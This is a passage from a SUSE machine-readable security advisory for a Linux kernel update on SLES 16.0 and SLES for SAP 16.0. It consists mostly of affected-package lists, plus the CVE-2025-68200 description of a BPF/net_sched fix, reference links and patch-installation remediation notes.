"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
